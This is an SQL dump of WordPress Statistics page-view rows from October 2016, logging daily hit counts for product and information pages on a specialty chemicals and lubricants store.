INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-s/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-05', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/about', '2016-10-05', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-05', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-05', 1, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings', '2016-10-05', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-05', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-05', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-05', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-05', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-05', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-05', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq', '2016-10-05', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-05', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding', '2016-10-05', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life', '2016-10-05', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-for-tire-mold-industry', '2016-10-05', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant', '2016-10-05', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-05', 2, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents-which-is-right-for-you', '2016-10-05', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents-which-is-right-for-you/', '2016-10-05', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/npb-and-hcfc-225-replacements', '2016-10-05', 1, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-for-vapor-degreasing', '2016-10-05', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-for-vapor-degreasing/', '2016-10-05', 2, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters', '2016-10-05', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator', '2016-10-05', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids', '2016-10-05', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-05', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent', '2016-10-05', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-3000/', '2016-10-05', 1, 968); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-05', 3, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-05', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n', '2016-10-05', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-05', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-for-vapor-degreasing/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/', '2016-10-05', 3, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/', '2016-10-05', 1, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a2/', '2016-10-05', 3, 1010); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/shieldsys-rfi-nickel-conductive-coating/', '2016-10-05', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-05', 2, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/', '2016-10-05', 2, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-05', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-05', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-06', 161, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-06', 542, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-06', 80, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/', '2016-10-06', 13, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-06', 19, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents-which-is-right-for-you/', '2016-10-06', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-06', 13, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-06', 43, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143te/', '2016-10-06', 4, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143te/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-06', 40, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-06', 9, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-06', 3, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-06', 38, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1163/', '2016-10-06', 5, 1019); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-06', 5, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-06', 4, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-06', 2, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/', '2016-10-06', 4, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-06', 4, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-06', 14, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-06', 10, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-06', 13, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-06', 2, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/?wc-ajax=get_refreshed_fragments', '2016-10-06', 2, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a3/', '2016-10-06', 1, 996); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a3/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 996); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/', '2016-10-06', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-06', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-06', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/', '2016-10-06', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-06', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-06', 9, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-06', 2, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-10-06', 3, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-06', 2, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-06', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/shieldsys-rfi-nickel-conductive-coating/', '2016-10-06', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-280282/', '2016-10-06', 3, 1713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-06', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-06', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-06', 4, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-06', 6, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-06', 3, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-06', 4, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/?wc-ajax=get_refreshed_fragments', '2016-10-06', 3, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-06', 4, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/?wc-ajax=get_refreshed_fragments', '2016-10-06', 2, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-06', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-06', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/', '2016-10-06', 1, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-06', 4, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-06', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-06', 2, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-06', 2, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-06', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-06', 5, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-06', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/', '2016-10-06', 2, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/?wc-ajax=get_refreshed_fragments', '2016-10-06', 3, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-06', 3, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a1/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 1009); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-06', 2, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64/', '2016-10-06', 2, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-06', 4, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-06', 1, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-06', 8, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-470c/', '2016-10-06', 2, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-06', 3, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-06', 2, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/', '2016-10-06', 2, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/', '2016-10-06', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143ax/', '2016-10-06', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/', '2016-10-06', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/', '2016-10-06', 1, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-62/', '2016-10-06', 1, 1216); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-06', 3, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/?wc-ajax=get_refreshed_fragments', '2016-10-06', 10, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122av/', '2016-10-06', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/releasys-8200/', '2016-10-06', 1, 297); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-06', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-06', 5, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/releasys-88/', '2016-10-06', 1, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-06', 3, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-06', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-538/', '2016-10-06', 1, 1836); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-06', 3, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-06', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/', '2016-10-06', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/?wc-ajax=get_refreshed_fragments', '2016-10-06', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-06', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-06', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-06', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-06', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/releasys/', '2016-10-06', 6, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-release-agents/', '2016-10-06', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-06', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-834/', '2016-10-06', 1, 885); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/', '2016-10-06', 2, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-06', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-06', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-06', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/agl-683/', '2016-10-06', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-06', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-06', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-465c/', '2016-10-06', 2, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-06', 3, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-06', 3, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements/', '2016-10-06', 3, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/', '2016-10-06', 1, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-06', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-06', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-06', 1, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-06', 4, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/embed/', '2016-10-06', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/', '2016-10-06', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2056', '2016-10-06', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143xd/', '2016-10-06', 2, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-10-06', 1, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/', '2016-10-06', 1, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-06', 2, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/', '2016-10-06', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ad/', '2016-10-06', 1, 645); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-sdg/', '2016-10-06', 1, 1268); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-813/', '2016-10-06', 1, 903); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-06', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-220/', '2016-10-06', 1, 410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/releasys-8500/', '2016-10-06', 1, 293); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/releasys-8800/', '2016-10-06', 1, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-06', 1, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/?wc-ajax=get_refreshed_fragments', '2016-10-06', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-07', 471, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-07', 148, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-07', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122av/', '2016-10-07', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122se/', '2016-10-07', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/releasys-8800/?wc-ajax=get_refreshed_fragments', '2016-10-07', 2, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-07', 4, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-07', 56, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-280282/', '2016-10-07', 1, 1713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-07', 3, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-07', 12, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/', '2016-10-07', 4, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-07', 3, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-07', 44, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-07', 2, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-07', 24, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/', '2016-10-07', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-07', 15, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-07', 4, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-07', 46, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-07', 18, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-07', 10, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-07', 1, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3155/', '2016-10-07', 1, 1065); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3370/', '2016-10-07', 1, 1061); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-07', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-07', 3, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/', '2016-10-07', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/', '2016-10-07', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-07', 6, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/', '2016-10-07', 1, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/', '2016-10-07', 1, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/', '2016-10-07', 21, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-07', 35, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-07', 14, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-07', 5, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-07', 2, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-07', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-114c/', '2016-10-07', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bd/', '2016-10-07', 1, 675); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-07', 3, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-07', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-07', 2, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-07', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/suprion/', '2016-10-07', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/', '2016-10-07', 2, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3245/', '2016-10-07', 1, 1187); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3245/?wc-ajax=get_refreshed_fragments', '2016-10-07', 1, 1187); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-07', 1, 842); 
